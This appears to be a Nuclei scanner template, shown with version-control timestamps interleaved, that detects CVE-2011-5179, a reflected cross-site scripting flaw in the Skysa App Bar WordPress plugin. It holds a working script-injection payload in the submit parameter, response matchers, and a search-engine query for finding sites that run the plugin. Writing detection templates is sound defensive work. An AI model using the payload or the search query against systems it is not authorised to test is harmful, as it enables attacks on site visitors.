2021-07-13 17:07:06 +00:00
id : CVE-2011-5179
info :
2022-09-09 17:34:37 +00:00
name : Skysa App Bar 1.04 - Cross-Site Scripting
2021-07-13 17:07:06 +00:00
author : daffainfo
severity : medium
2022-02-21 18:33:16 +00:00
description : A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2011-5179
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824
2022-05-17 09:18:12 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71486
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded
2022-02-21 18:33:16 +00:00
classification :
cve-id : CVE-2011-5179
2022-07-11 17:26:53 +00:00
metadata :
google-query : inurl:"/wp-content/plugins/skysa-official/"
2022-04-22 10:38:41 +00:00
tags : cve,cve2011,wordpress,xss,wp-plugin
2021-07-13 17:07:06 +00:00
requests :
- method : GET
path :
2021-07-19 05:29:15 +00:00
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-13 17:07:06 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-19 05:29:15 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-13 17:07:06 +00:00
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-02-21 18:33:16 +00:00
# Enhanced by mp on 2022/02/21